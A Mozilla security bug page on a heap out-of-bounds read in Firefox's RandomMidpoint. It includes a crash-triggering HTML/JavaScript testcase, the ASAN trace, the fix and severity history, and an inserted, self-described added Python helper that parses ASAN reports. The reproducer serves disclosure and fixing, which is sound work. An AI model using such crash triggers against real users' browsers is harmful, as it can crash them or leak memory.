Closed Bug 1442984 Opened 6 years ago Closed 6 years ago

heap out of bounds read in mozilla::nsRFPService::RandomMidpoint

Categories

(Core :: DOM: Core & HTML, defect)

60 Branch
defect
Not set
normal

Tracking


RESOLVED FIXED
mozilla60
Tracking Status
firefox-esr52 --- unaffected
firefox58 --- unaffected
firefox59 --- unaffected
firefox60 --- fixed

People

(Reporter: nils, Assigned: tjr)

References

Details

(Keywords: csectype-bounds, sec-low)

Attachments

(3 files)

The following testcase crashes the latest ASAN build of Firefox 60.0a1 () when loaded from an HTTP server.

crash.html:
<script>
function start() {
	o25=document.createElementNS('http://www.w3.org/1999/xhtml','audio');
	document.documentElement.appendChild(o25);
	o53=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o53.src='doesnt_exist.svg';
	window.top.document.body.appendChild(o53);
	o25.parentNode.insertBefore(o25.previousSibling,o25.nextSibling);
	o76=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o76.src='doesnt_exist.svg';
	window.top.document.body.appendChild(o76);
	o127=window.top.frames[1];
	o128=o127.document;
	o217=o128.createElementNS('http://www.w3.org/1999/xhtml','li');
	o217.appendChild(o53);
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==31598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000248654 at pc 0x7f3ff16ac72f bp 0x7ffe4e31b070 sp 0x7ffe4e31b068
READ of size 4 at 0x606000248654 thread T0 (Web Content)
    #0 0x7f3ff16ac72e in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41
    #1 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9
    #2 0x7f3fed13023f in mozilla::dom::PerformanceResourceTiming::StartTime() const /builds/worker/workspace/build/src/dom/performance/PerformanceResourceTiming.cpp:51:18
    #3 0x7f3fed11cf99 in LessThan /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PerformanceEntry.h:115:42
    #4 0x7f3fed11cf99 in operator()<RefPtr<mozilla::dom::PerformanceEntry> > /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:803
    #5 0x7f3fed11cf99 in BinarySearchIf<nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>, detail::ItemComparatorFirstElementGT<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BinarySearch.h:80
    #6 0x7f3fed11cf99 in IndexOfFirstElementGt<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1538
    #7 0x7f3fed11cf99 in RefPtr<mozilla::dom::PerformanceEntry>* nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>::InsertElementSorted<mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator, nsTArrayInfallibleAllocator>(mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator const&) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1557
    #8 0x7f3fed121f20 in InsertResourceEntry /builds/worker/workspace/build/src/dom/performance/Performance.cpp:411:20
    #9 0x7f3fed121f20 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:138
    #10 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27
    #11 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3
    #12 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12
    #13 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5
    #14 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306
    #15 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161
    #16 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #17 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #18 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #19 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #20 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #21 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #22 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #23 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #24 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #25 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #26 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #27 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #28 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #29 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #30 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #31 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #32 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)

0x606000248654 is located 12 bytes to the left of 64-byte region [0x606000248660,0x6060002486a0)
allocated by thread T0 (Web Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7f3fe5815281 in Alloc /builds/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:257:22
    #2 0x7f3fe5815281 in nsTSubstring<char>::MutatePrep(unsigned int, char**, mozilla::detail::StringDataFlags*) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:166
    #3 0x7f3fe582768b in nsTSubstring<char>::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:229:8
    #4 0x7f3fe5823ff8 in nsTSubstring<char>::Assign(char const*, unsigned int, std::nothrow_t const&) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:390:8
    #5 0x7f3fe5811217 in nsTSubstring<char>::Assign(char const*, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:366:8
    #6 0x7f3ff12c2a16 in nsCryptoHash::Finish(bool, nsTSubstring<char>&) /builds/worker/workspace/build/src/security/manager/ssl/nsCryptoHash.cpp:190:11
    #7 0x7f3ff16abf41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:405:19
    #8 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9
    #9 0x7f3fed133a2e in mozilla::dom::PerformanceTimingData::PerformanceTimingData(nsITimedChannel*, nsIHttpChannel*, double) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:116:15
    #10 0x7f3fed1227f9 in mozilla::dom::PerformanceTimingData::Create(nsITimedChannel*, nsIHttpChannel*, double, nsTSubstring<char16_t>&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:72:14
    #11 0x7f3fed121dd2 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:125:5
    #12 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27
    #13 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3
    #14 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12
    #15 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5
    #16 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306
    #17 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161
    #18 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #19 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #20 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #21 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #26 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #27 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #31 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #32 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*)
Shadow bytes around the buggy address:
  0x0c0c80041070: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c80041080: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c0c80041090: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c800410a0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c800410b0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
=>0x0c0c800410c0: 00 00 00 00 00 00 00 00 fa fa[fa]fa 00 00 00 00
  0x0c0c800410d0: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c800410e0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c800410f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c0c80041100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80041110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==31598==ABORTING
Attached file ASAN output
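For triaging reports like the one above, the following Python helper is an added example (not part of this bug, its patch, or Mozilla's tooling). It parses the lines of an AddressSanitizer heap-buffer-overflow report that a reviewer actually needs: the access kind and size, the signed offset of the faulting address from the start of the heap block (negative means the read landed in the left redzone, before the block, as here), the faulting frame, and the frame that allocated the block. The embedded sample is an excerpt of the report quoted above; the `infra_paths` heuristic that skips allocator and string-wrapper frames when naming the allocation site is an assumption of this example.

```python
"""Triage helper for AddressSanitizer heap-buffer-overflow reports (added example)."""
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Excerpt of the ASAN report attached to this bug (copied lines, frames abbreviated).
SAMPLE_REPORT = """\
==31598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000248654 at pc 0x7f3ff16ac72f bp 0x7ffe4e31b070 sp 0x7ffe4e31b068
READ of size 4 at 0x606000248654 thread T0 (Web Content)
    #0 0x7f3ff16ac72e in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41
    #1 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9

0x606000248654 is located 12 bytes to the left of 64-byte region [0x606000248660,0x6060002486a0)
allocated by thread T0 (Web Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7f3fe5815281 in Alloc /builds/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:257:22
    #2 0x7f3fe5815281 in nsTSubstring<char>::MutatePrep(unsigned int, char**, mozilla::detail::StringDataFlags*) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:166
    #3 0x7f3fe582768b in nsTSubstring<char>::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:229:8
    #4 0x7f3fe5823ff8 in nsTSubstring<char>::Assign(char const*, unsigned int, std::nothrow_t const&) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:390:8
    #5 0x7f3fe5811217 in nsTSubstring<char>::Assign(char const*, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:366:8
    #6 0x7f3ff12c2a16 in nsCryptoHash::Finish(bool, nsTSubstring<char>&) /builds/worker/workspace/build/src/security/manager/ssl/nsCryptoHash.cpp:190:11
"""

_ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
_ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-f]+)", re.M)
# Symbolized frame: "#N 0x... in <function> <path:line[:col]>" (frames without a path are skipped).
_FRAME_RE = re.compile(r"^\s*#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>.+?) (?P<loc>/\S+)$", re.M)
_REGION_RE = re.compile(
    r"(?P<addr>0x[0-9a-f]+) is located (?P<dist>\d+) bytes (?P<side>to the left|to the right|inside) "
    r"of (?P<size>\d+)-byte region \[(?P<lo>0x[0-9a-f]+),(?P<hi>0x[0-9a-f]+)\)"
)

# Heuristic (assumption of this example): frames whose path contains one of these are
# allocator or string-wrapper plumbing, not the logical allocation site.
DEFAULT_INFRA_PATHS: Tuple[str, ...] = ("/compiler-rt/lib/asan/", "/xpcom/string/")


@dataclass
class AsanTriage:
    kind: str
    op: str
    access_size: int
    fault_addr: int
    fault_frame: str            # function in frame #0 of the faulting access
    fault_location: str         # file:line:col of that frame
    region_size: int
    region_start: int
    offset: int                 # fault_addr - region_start; negative = before the block
    alloc_site: Optional[str]   # first allocation frame outside the infra paths

    @property
    def classification(self) -> str:
        """Where the access fell relative to the block the report names."""
        if self.offset < 0:
            return "underflow"
        if self.offset + self.access_size > self.region_size:
            return "overflow"
        return "in-bounds"


def parse_asan_report(text: str, infra_paths: Tuple[str, ...] = DEFAULT_INFRA_PATHS) -> AsanTriage:
    m_err, m_acc, m_reg = _ERROR_RE.search(text), _ACCESS_RE.search(text), _REGION_RE.search(text)
    if not (m_err and m_acc and m_reg):
        raise ValueError("not a heap-buffer-overflow report with region information")

    # Everything before the region line is the access stack, everything after is the allocation stack.
    access_frames = _FRAME_RE.findall(text[:m_reg.start()])
    alloc_frames = _FRAME_RE.findall(text[m_reg.end():])
    if not access_frames:
        raise ValueError("no symbolized frames for the faulting access")

    fault_addr = int(m_acc["addr"], 16)
    lo, hi, dist = int(m_reg["lo"], 16), int(m_reg["hi"], 16), int(m_reg["dist"])
    # Cross-check ASAN's own "N bytes to the left/right/inside" against the raw addresses.
    expected = {"to the left": lo - dist, "to the right": hi + dist, "inside": lo + dist}[m_reg["side"]]
    if expected != fault_addr:
        raise ValueError("region description does not match the faulting address")

    alloc_site = None
    for _, func, loc in alloc_frames:
        if not any(p in loc for p in infra_paths):
            alloc_site = f"{func} {loc}"
            break

    _, fault_func, fault_loc = access_frames[0]
    return AsanTriage(
        kind=m_err["kind"], op=m_acc["op"], access_size=int(m_acc["size"]),
        fault_addr=fault_addr, fault_frame=fault_func, fault_location=fault_loc,
        region_size=int(m_reg["size"]), region_start=lo, offset=fault_addr - lo,
        alloc_site=alloc_site,
    )


def summarize(t: AsanTriage) -> str:
    """One-line triage summary of the kind a reviewer would paste into a bug comment."""
    return (f"{t.kind}: {t.op} of {t.access_size} bytes at offset {t.offset:+d} from a "
            f"{t.region_size}-byte heap block ({t.classification}); faulting frame {t.fault_frame} "
            f"at {t.fault_location}; block allocated by {t.alloc_site}")


if __name__ == "__main__":
    print(summarize(parse_asan_report(SAMPLE_REPORT)))
```

Running the helper on the sample reports a 4-byte read at offset -12 from a 64-byte block (an underflow into the left redzone), faulting in RandomMidpoint at nsRFPService.cpp:416:41, with the block allocated by nsCryptoHash::Finish. The cross-check between ASAN's prose ("12 bytes to the left") and the raw addresses catches reports that were truncated or hand-edited before they reached the tracker.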
I think the title was a typo?
Summary: heap-use-after-free in mozilla::nsRFPService::RandomMidpoint → heap out of bounds read in mozilla::nsRFPService::RandomMidpoint
Attached patch 1442984.patch (Splinter Review)
Assignee: nobody → tom
Attachment #8956171 - Flags: review?(amarchesini)
Attachment #8956171 - Flags: review?(amarchesini) → review+
https://hg.mozilla.org/mozilla-central/rev/7376ba7d44f1
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla60
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Although out of bounds, what we're reading here is a numeric value that is used in a time calculation. We may end up with incorrect time fuzziness (maybe even time going backwards? Is that double-checked later or assumed good from the array?) but doesn't seem worse than that.
Flags: sec-bounty+ → sec-bounty-
Keywords: sec-high → sec-low
Group: core-security → core-security-release
Group: core-security-release
Component: DOM → DOM: Core & HTML